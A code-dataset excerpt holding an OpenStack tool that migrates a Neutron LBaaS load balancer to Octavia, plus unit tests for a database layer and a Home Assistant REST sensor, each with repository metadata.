groups = {'Plate+Well': {('Week1_22123', 'B05'): [(13,), (14,), (15,), (16,)], ('Week1_22123', 'B02'): [(1,), (2,), (3,), (4,)], ('Week1_22123', 'B04'): [(9,), (10,), (11,), (12,)], ('Week1_22123', 'B06'): [(17,), (18,), (19,), (20,)], ('Week1_22123', 'B03'): [(5,), (6,), (7,), (8,)]}}, {'Plate+Well': ['Image_Metadata_Plate_DAPI', 'Image_Metadata_Well_DAPI']}
assert len(self.db.GetAllImageKeys())==20
assert self.db.GetAllImageKeys() == vals
assert self.db.GetGroupMaps(True) == groups
def test_CreateMySQLTempTableFromData(self):
self.setup_mysql()
data = [['A01', 1, 1.],
['A02', 1, 2.],
['A03', 1, -np.inf],
['A04', 1, np.inf],
['A04', 1, np.nan],
['A04', 1, 100],
['A04', 1, 200],
]
colnames = ['well', 'plate', 'vals']
self.db.CreateTableFromData(data, colnames, '__test_table', temporary=True)
res = self.db.execute('select * from __test_table')
assert res==[('A01', 1, 1.0), ('A02', 1, 2.0), ('A03', 1, None), ('A04', 1, None), ('A04', 1, None), ('A04', 1, 100.0), ('A04', 1, 200.0)]
def test_CreateSQLiteTempTableFromData(self):
self.setup_sqlite()
data = [['A01', 1, 1.],
['A02', 1, 2.],
['A03', 1, -np.inf],
['A04', 1, np.inf],
['A04', 1, np.nan],
['A04', 1, 100],
['A04', 1, 200],
]
colnames = ['well', 'plate', 'vals']
self.db.CreateTableFromData(data, colnames, '__test_table', temporary=True)
res = self.db.execute('select * from __test_table')
assert res==[('A01', 1, 1.0), ('A02', 1, 2.0), ('A03', 1, None), ('A04', 1, None), ('A04', 1, None), ('A04', 1, 100.0), ('A04', 1, 200.0)]
if __name__ == '__main__':
unittest.main()
| true
| true
|
1c490fef6fa62645dca9cb9109b50fc4d89a7c7c
| 12,196
|
py
|
Python
|
nlbaas2octavia_lb_replicator/manager.py
|
johanssone/nlbaas2octavia-lb-replicator
|
3b49d48132c172d8b6c8d3ec529da0bc224788cb
|
[
"Apache-2.0"
] | null | null | null |
nlbaas2octavia_lb_replicator/manager.py
|
johanssone/nlbaas2octavia-lb-replicator
|
3b49d48132c172d8b6c8d3ec529da0bc224788cb
|
[
"Apache-2.0"
] | null | null | null |
nlbaas2octavia_lb_replicator/manager.py
|
johanssone/nlbaas2octavia-lb-replicator
|
3b49d48132c172d8b6c8d3ec529da0bc224788cb
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 Nir Magnezi
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import neutronclient
from pprint import pprint
from nlbaas2octavia_lb_replicator.common import os_clients
from nlbaas2octavia_lb_replicator.common import utils
class Manager(object):
def __init__(self, lb_id):
self.os_clients = os_clients.OpenStackClients()
self._lb_id = lb_id
self._lb_fip = {}
self._lb_tree = {}
self._lb_details = {}
self._lb_listeners = {}
self._lb_pools = {}
self._lb_def_pool_ids = []
self._lb_healthmonitors = {}
self._lb_members = {}
def _pools_deep_scan(self, pools_list):
for pool in pools_list:
pool_id = pool['id']
lb_pool = self.os_clients.neutronclient.show_lbaas_pool(pool_id)
self._lb_pools[pool_id] = lb_pool
if pool.get('healthmonitor'):
# Health monitor is optional
healthmonitor_id = pool['healthmonitor']['id']
lb_healthmonitor = (
self.os_clients.neutronclient
.show_lbaas_healthmonitor(healthmonitor_id)['healthmonitor']
)
self._lb_healthmonitors[healthmonitor_id] = lb_healthmonitor
for member in pool['members']:
member_id = member['id']
lb_member = (
self.os_clients.neutronclient
.show_lbaas_member(member_id, pool_id)
)
self._lb_members[member_id] = lb_member
def collect_lb_info_from_api(self):
self._lb_tree = (
self.os_clients.neutronclient.retrieve_loadbalancer_status(
loadbalancer=self._lb_id)
)
self._lb_details = self.os_clients.neutronclient.show_loadbalancer(
self._lb_id)
fips = self.os_clients.neutronclient.list_floatingips(
port_id=self._lb_details['loadbalancer']['vip_port_id']
).get('floatingips')
if fips:
self._lb_fip = fips[0]
# Scan lb_tree and retrive all objects to backup all the info
# that tree is missing out. The Octavia lb tree contain more details.
for listener in (
self._lb_tree['statuses']['loadbalancer']['listeners']):
listener_id = listener['id']
lb_listener = (
self.os_clients.neutronclient.show_listener(listener_id)
)
self._lb_listeners[listener_id] = lb_listener
self._pools_deep_scan(listener['pools'])
# NOTE(mnaser): If there is no pools, the pools value can be empty
# so we try to get a default value.
pools = self._lb_tree['statuses']['loadbalancer'].get('pools', [])
self._pools_deep_scan(pools)
def write_lb_data_file(self, filename):
self._lb_pools = self.fix_duplicate_pool_names(self._lb_pools)
lb_data = {
'lb_id': self._lb_id,
'lb_fip': self._lb_fip,
'lb_tree': self._lb_tree,
'lb_details': self._lb_details,
'lb_listeners': self._lb_listeners,
'lb_pools': self._lb_pools,
'lb_healthmonitors': self._lb_healthmonitors,
'lb_members': self._lb_members
}
with open(filename, 'w') as f:
json.dump(lb_data, f, sort_keys=True, indent=4)
def read_lb_data_file(self, filename):
# Read load balancer data from a local JSON file.
with open(filename) as f:
lb_data = json.load(f)
try:
if self._lb_id == lb_data['lb_id']:
self._lb_fip = lb_data['lb_fip']
self._lb_tree = lb_data['lb_tree']
self._lb_details = lb_data['lb_details']
self._lb_listeners = lb_data['lb_listeners']
self._lb_pools = lb_data['lb_pools']
self._lb_healthmonitors = lb_data['lb_healthmonitors']
self._lb_members = lb_data['lb_members']
except ValueError:
print('The file content does not match the lb_id you specified')
def fix_duplicate_pool_names(self, lb_pools):
rev_dict = {}
for k,v in lb_pools.iteritems():
rev_dict.setdefault(v['pool']['name'], set()).add(k)
duplicates = []
for key, values in rev_dict.items():
if len(values) > 1:
duplicates.append({key: values})
for dup in duplicates:
for k, v in dup.items():
count = 1
for ids in v:
lb_pools[ids]['pool']['name'] = "{}_{}".format(k, count)
count+=1
return lb_pools
def _build_healthmonitor_obj(self, pool_id):
nlbaas_pool_data = self._lb_pools[pool_id]['pool']
octavia_hm = None
if nlbaas_pool_data.get('healthmonitor_id'):
healthmonitor_id = nlbaas_pool_data['healthmonitor_id']
healthmonitor_data = self._lb_healthmonitors[healthmonitor_id]
octavia_hm = {
'type': healthmonitor_data.get('type'),
'delay': healthmonitor_data.get('delay'),
'expected_codes': healthmonitor_data.get('expected_codes'),
'http_method': healthmonitor_data.get('http_method'),
'max_retries': healthmonitor_data.get('max_retries'),
'timeout': healthmonitor_data.get('timeout'),
'url_path': healthmonitor_data.get('url_path')
}
return octavia_hm
def _build_members_list(self, pool_id):
nlbaas_pool_data = self._lb_pools[pool_id]['pool']
octavia_lb_members = []
for member in nlbaas_pool_data['members']:
member_id = member['id']
member_data = self._lb_members[member_id]['member']
octavia_member = {
'admin_state_up': member_data['admin_state_up'],
'name': member_data['name'],
'address': member_data['address'],
'protocol_port': member_data['protocol_port'],
'subnet_id': member_data['subnet_id'],
'weight': member_data['weight']
}
octavia_lb_members.append(octavia_member)
return octavia_lb_members
def _build_listeners_list(self):
nlbaas_lb_tree = self._lb_tree['statuses']['loadbalancer']
octavia_lb_listeners = []
for listener in nlbaas_lb_tree['listeners']:
listener_id = listener['id']
nlbaas_listener_data = self._lb_listeners[listener_id]['listener']
default_pool = None
pool_id = nlbaas_listener_data['default_pool_id']
if pool_id is not None and pool_id not in self._lb_def_pool_ids:
self._lb_def_pool_ids.append(pool_id)
nlbaas_default_pool_data = \
self._lb_pools[pool_id]['pool']
default_pool_name = "legacy-%s" % nlbaas_default_pool_data['id']
if nlbaas_default_pool_data['name']:
default_pool_name = nlbaas_default_pool_data['name']
default_pool = {
'name': default_pool_name,
'protocol': nlbaas_default_pool_data['protocol'],
'lb_algorithm': nlbaas_default_pool_data['lb_algorithm'],
'healthmonitor': self._build_healthmonitor_obj(pool_id) or '',
'members': self._build_members_list(pool_id) or '',
}
listener_name = nlbaas_listener_data['name']
if not listener_name:
listener_name = "listener-%s" % nlbaas_listener_data['id']
octavia_listener = {
'name': listener_name,
'protocol': nlbaas_listener_data['protocol'],
'protocol_port': nlbaas_listener_data['protocol_port'],
'default_pool': default_pool,
}
octavia_lb_listeners.append(octavia_listener)
return octavia_lb_listeners
def _build_pools_list(self):
nlbaas_lb_tree = self._lb_tree['statuses']['loadbalancer']
octavia_lb_pools = []
for pool in nlbaas_lb_tree.get('pools', []):
pool_id = pool['id']
if pool_id in self._lb_def_pool_ids:
continue
else:
nlbaas_pool_data = self._lb_pools[pool_id]['pool']
pool_name = nlbaas_pool_data['name']
if not pool_name:
pool_name = "pool-%s" % nlbaas_pool_data['id']
octavia_pool = {
'name': pool_name,
'description': nlbaas_pool_data['description'],
'protocol': nlbaas_pool_data['protocol'],
'lb_algorithm': nlbaas_pool_data['lb_algorithm'],
'healthmonitor':
self._build_healthmonitor_obj(pool_id) or '',
'members': self._build_members_list(pool_id) or ''
}
octavia_lb_pools.append(octavia_pool)
return octavia_lb_pools
def build_octavia_lb_tree(self, reuse_vip):
nlbaas_lb_details = self._lb_details['loadbalancer']
octavia_lb_tree = {
'loadbalancer': {
'name': nlbaas_lb_details['name'],
'description': nlbaas_lb_details['description'],
'admin_state_up': nlbaas_lb_details['admin_state_up'],
'project_id': nlbaas_lb_details['tenant_id'],
'flavor_id': '',
'listeners': self._build_listeners_list(),
'pools': self._build_pools_list(),
'vip_subnet_id': nlbaas_lb_details['vip_subnet_id'],
'vip_address': nlbaas_lb_details['vip_address']
if reuse_vip else ''
}
}
utils._remove_empty(octavia_lb_tree)
return octavia_lb_tree
def octavia_load_balancer_create(self, reuse_vip):
# Delete all health monitors
for healthmonitor_id, healthmonitor_data in self._lb_healthmonitors.items():
try:
self.os_clients.neutronclient.delete_lbaas_healthmonitor(healthmonitor_id)
except neutronclient.common.exceptions.NotFound:
pass
# Delete all pools
for pool_id, pool_data in self._lb_pools.items():
try:
self.os_clients.neutronclient.delete_lbaas_pool(pool_id)
except neutronclient.common.exceptions.NotFound:
pass
# Delete all listeners
for listener_id, listener_data in self._lb_listeners.items():
try:
self.os_clients.neutronclient.delete_listener(listener_id)
except neutronclient.common.exceptions.NotFound:
pass
# Delete loadbalancer
try:
self.os_clients.neutronclient.delete_loadbalancer(self._lb_id)
except neutronclient.common.exceptions.NotFound:
pass
octavia_lb_tree = self.build_octavia_lb_tree(reuse_vip)
pprint(octavia_lb_tree)
new_lb = self.os_clients.octaviaclient.load_balancer_create(
json=octavia_lb_tree)
if self._lb_fip:
vip_port_id = new_lb['loadbalancer']['vip_port_id']
self.os_clients.neutronclient.update_floatingip(
self._lb_fip['id'],
{"floatingip": {"port_id": vip_port_id}}
)
pprint(new_lb)
pprint(self._lb_fip)
| 40.384106
| 90
| 0.589866
|
import json
import neutronclient
from pprint import pprint
from nlbaas2octavia_lb_replicator.common import os_clients
from nlbaas2octavia_lb_replicator.common import utils
class Manager(object):
def __init__(self, lb_id):
self.os_clients = os_clients.OpenStackClients()
self._lb_id = lb_id
self._lb_fip = {}
self._lb_tree = {}
self._lb_details = {}
self._lb_listeners = {}
self._lb_pools = {}
self._lb_def_pool_ids = []
self._lb_healthmonitors = {}
self._lb_members = {}
def _pools_deep_scan(self, pools_list):
for pool in pools_list:
pool_id = pool['id']
lb_pool = self.os_clients.neutronclient.show_lbaas_pool(pool_id)
self._lb_pools[pool_id] = lb_pool
if pool.get('healthmonitor'):
healthmonitor_id = pool['healthmonitor']['id']
lb_healthmonitor = (
self.os_clients.neutronclient
.show_lbaas_healthmonitor(healthmonitor_id)['healthmonitor']
)
self._lb_healthmonitors[healthmonitor_id] = lb_healthmonitor
for member in pool['members']:
member_id = member['id']
lb_member = (
self.os_clients.neutronclient
.show_lbaas_member(member_id, pool_id)
)
self._lb_members[member_id] = lb_member
def collect_lb_info_from_api(self):
self._lb_tree = (
self.os_clients.neutronclient.retrieve_loadbalancer_status(
loadbalancer=self._lb_id)
)
self._lb_details = self.os_clients.neutronclient.show_loadbalancer(
self._lb_id)
fips = self.os_clients.neutronclient.list_floatingips(
port_id=self._lb_details['loadbalancer']['vip_port_id']
).get('floatingips')
if fips:
self._lb_fip = fips[0]
for listener in (
self._lb_tree['statuses']['loadbalancer']['listeners']):
listener_id = listener['id']
lb_listener = (
self.os_clients.neutronclient.show_listener(listener_id)
)
self._lb_listeners[listener_id] = lb_listener
self._pools_deep_scan(listener['pools'])
pools = self._lb_tree['statuses']['loadbalancer'].get('pools', [])
self._pools_deep_scan(pools)
def write_lb_data_file(self, filename):
self._lb_pools = self.fix_duplicate_pool_names(self._lb_pools)
lb_data = {
'lb_id': self._lb_id,
'lb_fip': self._lb_fip,
'lb_tree': self._lb_tree,
'lb_details': self._lb_details,
'lb_listeners': self._lb_listeners,
'lb_pools': self._lb_pools,
'lb_healthmonitors': self._lb_healthmonitors,
'lb_members': self._lb_members
}
with open(filename, 'w') as f:
json.dump(lb_data, f, sort_keys=True, indent=4)
def read_lb_data_file(self, filename):
with open(filename) as f:
lb_data = json.load(f)
try:
if self._lb_id == lb_data['lb_id']:
self._lb_fip = lb_data['lb_fip']
self._lb_tree = lb_data['lb_tree']
self._lb_details = lb_data['lb_details']
self._lb_listeners = lb_data['lb_listeners']
self._lb_pools = lb_data['lb_pools']
self._lb_healthmonitors = lb_data['lb_healthmonitors']
self._lb_members = lb_data['lb_members']
except ValueError:
print('The file content does not match the lb_id you specified')
def fix_duplicate_pool_names(self, lb_pools):
rev_dict = {}
for k,v in lb_pools.iteritems():
rev_dict.setdefault(v['pool']['name'], set()).add(k)
duplicates = []
for key, values in rev_dict.items():
if len(values) > 1:
duplicates.append({key: values})
for dup in duplicates:
for k, v in dup.items():
count = 1
for ids in v:
lb_pools[ids]['pool']['name'] = "{}_{}".format(k, count)
count+=1
return lb_pools
def _build_healthmonitor_obj(self, pool_id):
nlbaas_pool_data = self._lb_pools[pool_id]['pool']
octavia_hm = None
if nlbaas_pool_data.get('healthmonitor_id'):
healthmonitor_id = nlbaas_pool_data['healthmonitor_id']
healthmonitor_data = self._lb_healthmonitors[healthmonitor_id]
octavia_hm = {
'type': healthmonitor_data.get('type'),
'delay': healthmonitor_data.get('delay'),
'expected_codes': healthmonitor_data.get('expected_codes'),
'http_method': healthmonitor_data.get('http_method'),
'max_retries': healthmonitor_data.get('max_retries'),
'timeout': healthmonitor_data.get('timeout'),
'url_path': healthmonitor_data.get('url_path')
}
return octavia_hm
def _build_members_list(self, pool_id):
nlbaas_pool_data = self._lb_pools[pool_id]['pool']
octavia_lb_members = []
for member in nlbaas_pool_data['members']:
member_id = member['id']
member_data = self._lb_members[member_id]['member']
octavia_member = {
'admin_state_up': member_data['admin_state_up'],
'name': member_data['name'],
'address': member_data['address'],
'protocol_port': member_data['protocol_port'],
'subnet_id': member_data['subnet_id'],
'weight': member_data['weight']
}
octavia_lb_members.append(octavia_member)
return octavia_lb_members
def _build_listeners_list(self):
nlbaas_lb_tree = self._lb_tree['statuses']['loadbalancer']
octavia_lb_listeners = []
for listener in nlbaas_lb_tree['listeners']:
listener_id = listener['id']
nlbaas_listener_data = self._lb_listeners[listener_id]['listener']
default_pool = None
pool_id = nlbaas_listener_data['default_pool_id']
if pool_id is not None and pool_id not in self._lb_def_pool_ids:
self._lb_def_pool_ids.append(pool_id)
nlbaas_default_pool_data = \
self._lb_pools[pool_id]['pool']
default_pool_name = "legacy-%s" % nlbaas_default_pool_data['id']
if nlbaas_default_pool_data['name']:
default_pool_name = nlbaas_default_pool_data['name']
default_pool = {
'name': default_pool_name,
'protocol': nlbaas_default_pool_data['protocol'],
'lb_algorithm': nlbaas_default_pool_data['lb_algorithm'],
'healthmonitor': self._build_healthmonitor_obj(pool_id) or '',
'members': self._build_members_list(pool_id) or '',
}
listener_name = nlbaas_listener_data['name']
if not listener_name:
listener_name = "listener-%s" % nlbaas_listener_data['id']
octavia_listener = {
'name': listener_name,
'protocol': nlbaas_listener_data['protocol'],
'protocol_port': nlbaas_listener_data['protocol_port'],
'default_pool': default_pool,
}
octavia_lb_listeners.append(octavia_listener)
return octavia_lb_listeners
def _build_pools_list(self):
nlbaas_lb_tree = self._lb_tree['statuses']['loadbalancer']
octavia_lb_pools = []
for pool in nlbaas_lb_tree.get('pools', []):
pool_id = pool['id']
if pool_id in self._lb_def_pool_ids:
continue
else:
nlbaas_pool_data = self._lb_pools[pool_id]['pool']
pool_name = nlbaas_pool_data['name']
if not pool_name:
pool_name = "pool-%s" % nlbaas_pool_data['id']
octavia_pool = {
'name': pool_name,
'description': nlbaas_pool_data['description'],
'protocol': nlbaas_pool_data['protocol'],
'lb_algorithm': nlbaas_pool_data['lb_algorithm'],
'healthmonitor':
self._build_healthmonitor_obj(pool_id) or '',
'members': self._build_members_list(pool_id) or ''
}
octavia_lb_pools.append(octavia_pool)
return octavia_lb_pools
def build_octavia_lb_tree(self, reuse_vip):
nlbaas_lb_details = self._lb_details['loadbalancer']
octavia_lb_tree = {
'loadbalancer': {
'name': nlbaas_lb_details['name'],
'description': nlbaas_lb_details['description'],
'admin_state_up': nlbaas_lb_details['admin_state_up'],
'project_id': nlbaas_lb_details['tenant_id'],
'flavor_id': '',
'listeners': self._build_listeners_list(),
'pools': self._build_pools_list(),
'vip_subnet_id': nlbaas_lb_details['vip_subnet_id'],
'vip_address': nlbaas_lb_details['vip_address']
if reuse_vip else ''
}
}
utils._remove_empty(octavia_lb_tree)
return octavia_lb_tree
def octavia_load_balancer_create(self, reuse_vip):
for healthmonitor_id, healthmonitor_data in self._lb_healthmonitors.items():
try:
self.os_clients.neutronclient.delete_lbaas_healthmonitor(healthmonitor_id)
except neutronclient.common.exceptions.NotFound:
pass
for pool_id, pool_data in self._lb_pools.items():
try:
self.os_clients.neutronclient.delete_lbaas_pool(pool_id)
except neutronclient.common.exceptions.NotFound:
pass
for listener_id, listener_data in self._lb_listeners.items():
try:
self.os_clients.neutronclient.delete_listener(listener_id)
except neutronclient.common.exceptions.NotFound:
pass
try:
self.os_clients.neutronclient.delete_loadbalancer(self._lb_id)
except neutronclient.common.exceptions.NotFound:
pass
octavia_lb_tree = self.build_octavia_lb_tree(reuse_vip)
pprint(octavia_lb_tree)
new_lb = self.os_clients.octaviaclient.load_balancer_create(
json=octavia_lb_tree)
if self._lb_fip:
vip_port_id = new_lb['loadbalancer']['vip_port_id']
self.os_clients.neutronclient.update_floatingip(
self._lb_fip['id'],
{"floatingip": {"port_id": vip_port_id}}
)
pprint(new_lb)
pprint(self._lb_fip)
| true
| true
|
1c4910927a53cf04a6f0417f5960276458b1c42a
| 8,047
|
py
|
Python
|
tests/components/sensor/test_rest.py
|
loraxx753/skynet
|
86a1b0a6c6a3f81bc92d4f61de6a9a6b9f964543
|
[
"Apache-2.0"
] | 1
|
2021-01-02T14:13:46.000Z
|
2021-01-02T14:13:46.000Z
|
tests/components/sensor/test_rest.py
|
bytebility/home-assistant
|
6015274ee2486f797fd6ee8f5f2074a601953e03
|
[
"MIT"
] | 1
|
2017-03-10T22:17:06.000Z
|
2017-03-10T22:17:06.000Z
|
tests/components/sensor/test_rest.py
|
bytebility/home-assistant
|
6015274ee2486f797fd6ee8f5f2074a601953e03
|
[
"MIT"
] | 2
|
2018-06-03T11:14:44.000Z
|
2018-11-04T18:18:12.000Z
|
"""The tests for the REST switch platform."""
import unittest
from unittest.mock import patch, Mock
import requests
from requests.exceptions import Timeout, MissingSchema, RequestException
import requests_mock
from homeassistant.bootstrap import setup_component
import homeassistant.components.sensor as sensor
import homeassistant.components.sensor.rest as rest
from homeassistant.const import STATE_UNKNOWN
from homeassistant.helpers.config_validation import template
from tests.common import get_test_home_assistant, assert_setup_component
class TestRestSwitchSetup(unittest.TestCase):
"""Tests for setting up the REST switch platform."""
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
def test_setup_missing_config(self):
"""Test setup with configuration missing required entries."""
with assert_setup_component(0):
assert setup_component(self.hass, sensor.DOMAIN, {
'sensor': {'platform': 'rest'}})
def test_setup_missing_schema(self):
"""Test setup with resource missing schema."""
with self.assertRaises(MissingSchema):
rest.setup_platform(self.hass, {
'platform': 'rest',
'resource': 'localhost',
'method': 'GET'
}, None)
@patch('requests.Session.send',
side_effect=requests.exceptions.ConnectionError())
def test_setup_failed_connect(self, mock_req):
"""Test setup when connection error occurs."""
self.assertFalse(rest.setup_platform(self.hass, {
'platform': 'rest',
'resource': 'http://localhost',
}, None))
@patch('requests.Session.send', side_effect=Timeout())
def test_setup_timeout(self, mock_req):
"""Test setup when connection timeout occurs."""
self.assertFalse(rest.setup_platform(self.hass, {
'platform': 'rest',
'resource': 'http://localhost',
}, None))
@requests_mock.Mocker()
def test_setup_minimum(self, mock_req):
"""Test setup with minimum configuration."""
mock_req.get('http://localhost', status_code=200)
self.assertTrue(setup_component(self.hass, 'sensor', {
'sensor': {
'platform': 'rest',
'resource': 'http://localhost'
}
}))
self.assertEqual(2, mock_req.call_count)
assert_setup_component(1, 'switch')
@requests_mock.Mocker()
def test_setup_get(self, mock_req):
"""Test setup with valid configuration."""
mock_req.get('http://localhost', status_code=200)
self.assertTrue(setup_component(self.hass, 'sensor', {
'sensor': {
'platform': 'rest',
'resource': 'http://localhost',
'method': 'GET',
'value_template': '{{ value_json.key }}',
'name': 'foo',
'unit_of_measurement': 'MB',
'verify_ssl': 'true',
'authentication': 'basic',
'username': 'my username',
'password': 'my password',
'headers': {'Accept': 'application/json'}
}
}))
self.assertEqual(2, mock_req.call_count)
assert_setup_component(1, 'sensor')
@requests_mock.Mocker()
def test_setup_post(self, mock_req):
"""Test setup with valid configuration."""
mock_req.post('http://localhost', status_code=200)
self.assertTrue(setup_component(self.hass, 'sensor', {
'sensor': {
'platform': 'rest',
'resource': 'http://localhost',
'method': 'POST',
'value_template': '{{ value_json.key }}',
'payload': '{ "device": "toaster"}',
'name': 'foo',
'unit_of_measurement': 'MB',
'verify_ssl': 'true',
'authentication': 'basic',
'username': 'my username',
'password': 'my password',
'headers': {'Accept': 'application/json'}
}
}))
self.assertEqual(2, mock_req.call_count)
assert_setup_component(1, 'sensor')
class TestRestSensor(unittest.TestCase):
"""Tests for REST sensor platform."""
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.initial_state = 'initial_state'
self.rest = Mock('rest.RestData')
self.rest.update = Mock('rest.RestData.update',
side_effect=self.update_side_effect(
'{ "key": "' + self.initial_state + '" }'))
self.name = 'foo'
self.unit_of_measurement = 'MB'
self.value_template = template('{{ value_json.key }}')
self.value_template.hass = self.hass
self.sensor = rest.RestSensor(self.hass, self.rest, self.name,
self.unit_of_measurement,
self.value_template)
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
def update_side_effect(self, data):
"""Side effect function for mocking RestData.update()."""
self.rest.data = data
def test_name(self):
"""Test the name."""
self.assertEqual(self.name, self.sensor.name)
def test_unit_of_measurement(self):
"""Test the unit of measurement."""
self.assertEqual(self.unit_of_measurement,
self.sensor.unit_of_measurement)
def test_state(self):
"""Test the initial state."""
self.assertEqual(self.initial_state, self.sensor.state)
def test_update_when_value_is_none(self):
"""Test state gets updated to unknown when sensor returns no data."""
self.rest.update = Mock('rest.RestData.update',
side_effect=self.update_side_effect(None))
self.sensor.update()
self.assertEqual(STATE_UNKNOWN, self.sensor.state)
def test_update_when_value_changed(self):
"""Test state gets updated when sensor returns a new status."""
self.rest.update = Mock('rest.RestData.update',
side_effect=self.update_side_effect(
'{ "key": "updated_state" }'))
self.sensor.update()
self.assertEqual('updated_state', self.sensor.state)
def test_update_with_no_template(self):
"""Test update when there is no value template."""
self.rest.update = Mock('rest.RestData.update',
side_effect=self.update_side_effect(
'plain_state'))
self.sensor = rest.RestSensor(self.hass, self.rest, self.name,
self.unit_of_measurement, None)
self.sensor.update()
self.assertEqual('plain_state', self.sensor.state)
class TestRestData(unittest.TestCase):
"""Tests for RestData."""
def setUp(self):
"""Setup things to be run when tests are started."""
self.method = "GET"
self.resource = "http://localhost"
self.verify_ssl = True
self.rest = rest.RestData(self.method, self.resource, None, None, None,
self.verify_ssl)
@requests_mock.Mocker()
def test_update(self, mock_req):
"""Test update."""
mock_req.get('http://localhost', text='test data')
self.rest.update()
self.assertEqual('test data', self.rest.data)
@patch('requests.Session', side_effect=RequestException)
def test_update_request_exception(self, mock_req):
"""Test update when a request exception occurs."""
self.rest.update()
self.assertEqual(None, self.rest.data)
| 38.319048
| 79
| 0.58643
|
import unittest
from unittest.mock import patch, Mock
import requests
from requests.exceptions import Timeout, MissingSchema, RequestException
import requests_mock
from homeassistant.bootstrap import setup_component
import homeassistant.components.sensor as sensor
import homeassistant.components.sensor.rest as rest
from homeassistant.const import STATE_UNKNOWN
from homeassistant.helpers.config_validation import template
from tests.common import get_test_home_assistant, assert_setup_component
class TestRestSwitchSetup(unittest.TestCase):
def setUp(self):
self.hass = get_test_home_assistant()
def tearDown(self):
self.hass.stop()
def test_setup_missing_config(self):
with assert_setup_component(0):
assert setup_component(self.hass, sensor.DOMAIN, {
'sensor': {'platform': 'rest'}})
def test_setup_missing_schema(self):
with self.assertRaises(MissingSchema):
rest.setup_platform(self.hass, {
'platform': 'rest',
'resource': 'localhost',
'method': 'GET'
}, None)
@patch('requests.Session.send',
side_effect=requests.exceptions.ConnectionError())
def test_setup_failed_connect(self, mock_req):
self.assertFalse(rest.setup_platform(self.hass, {
'platform': 'rest',
'resource': 'http://localhost',
}, None))
@patch('requests.Session.send', side_effect=Timeout())
def test_setup_timeout(self, mock_req):
self.assertFalse(rest.setup_platform(self.hass, {
'platform': 'rest',
'resource': 'http://localhost',
}, None))
@requests_mock.Mocker()
def test_setup_minimum(self, mock_req):
mock_req.get('http://localhost', status_code=200)
self.assertTrue(setup_component(self.hass, 'sensor', {
'sensor': {
'platform': 'rest',
'resource': 'http://localhost'
}
}))
self.assertEqual(2, mock_req.call_count)
assert_setup_component(1, 'switch')
@requests_mock.Mocker()
def test_setup_get(self, mock_req):
mock_req.get('http://localhost', status_code=200)
self.assertTrue(setup_component(self.hass, 'sensor', {
'sensor': {
'platform': 'rest',
'resource': 'http://localhost',
'method': 'GET',
'value_template': '{{ value_json.key }}',
'name': 'foo',
'unit_of_measurement': 'MB',
'verify_ssl': 'true',
'authentication': 'basic',
'username': 'my username',
'password': 'my password',
'headers': {'Accept': 'application/json'}
}
}))
self.assertEqual(2, mock_req.call_count)
assert_setup_component(1, 'sensor')
@requests_mock.Mocker()
def test_setup_post(self, mock_req):
mock_req.post('http://localhost', status_code=200)
self.assertTrue(setup_component(self.hass, 'sensor', {
'sensor': {
'platform': 'rest',
'resource': 'http://localhost',
'method': 'POST',
'value_template': '{{ value_json.key }}',
'payload': '{ "device": "toaster"}',
'name': 'foo',
'unit_of_measurement': 'MB',
'verify_ssl': 'true',
'authentication': 'basic',
'username': 'my username',
'password': 'my password',
'headers': {'Accept': 'application/json'}
}
}))
self.assertEqual(2, mock_req.call_count)
assert_setup_component(1, 'sensor')
class TestRestSensor(unittest.TestCase):
def setUp(self):
self.hass = get_test_home_assistant()
self.initial_state = 'initial_state'
self.rest = Mock('rest.RestData')
self.rest.update = Mock('rest.RestData.update',
side_effect=self.update_side_effect(
'{ "key": "' + self.initial_state + '" }'))
self.name = 'foo'
self.unit_of_measurement = 'MB'
self.value_template = template('{{ value_json.key }}')
self.value_template.hass = self.hass
self.sensor = rest.RestSensor(self.hass, self.rest, self.name,
self.unit_of_measurement,
self.value_template)
def tearDown(self):
self.hass.stop()
def update_side_effect(self, data):
self.rest.data = data
def test_name(self):
self.assertEqual(self.name, self.sensor.name)
def test_unit_of_measurement(self):
self.assertEqual(self.unit_of_measurement,
self.sensor.unit_of_measurement)
def test_state(self):
self.assertEqual(self.initial_state, self.sensor.state)
def test_update_when_value_is_none(self):
self.rest.update = Mock('rest.RestData.update',
side_effect=self.update_side_effect(None))
self.sensor.update()
self.assertEqual(STATE_UNKNOWN, self.sensor.state)
def test_update_when_value_changed(self):
self.rest.update = Mock('rest.RestData.update',
side_effect=self.update_side_effect(
'{ "key": "updated_state" }'))
self.sensor.update()
self.assertEqual('updated_state', self.sensor.state)
def test_update_with_no_template(self):
self.rest.update = Mock('rest.RestData.update',
side_effect=self.update_side_effect(
'plain_state'))
self.sensor = rest.RestSensor(self.hass, self.rest, self.name,
self.unit_of_measurement, None)
self.sensor.update()
self.assertEqual('plain_state', self.sensor.state)
class TestRestData(unittest.TestCase):
def setUp(self):
self.method = "GET"
self.resource = "http://localhost"
self.verify_ssl = True
self.rest = rest.RestData(self.method, self.resource, None, None, None,
self.verify_ssl)
@requests_mock.Mocker()
def test_update(self, mock_req):
mock_req.get('http://localhost', text='test data')
self.rest.update()
self.assertEqual('test data', self.rest.data)
@patch('requests.Session', side_effect=RequestException)
def test_update_request_exception(self, mock_req):
self.rest.update()
self.assertEqual(None, self.rest.data)
| true
| true
|
1c4911bff2f56abbbc4f11c72c3e927e4d9f64ad
| 7,231
|
py
|
Python
|
hydrogels/reactions/structural.py
|
debeshmandal/hydrogels
|
3ca065c21ae834ab350f9fae78cee611f945d853
|
[
"MIT"
] | 3
|
2020-05-13T01:07:30.000Z
|
2021-02-12T13:37:23.000Z
|
hydrogels/reactions/structural.py
|
debeshmandal/hydrogels
|
3ca065c21ae834ab350f9fae78cee611f945d853
|
[
"MIT"
] | 24
|
2020-06-04T13:48:57.000Z
|
2021-12-31T18:46:52.000Z
|
hydrogels/reactions/structural.py
|
debeshmandal/hydrogels
|
3ca065c21ae834ab350f9fae78cee611f945d853
|
[
"MIT"
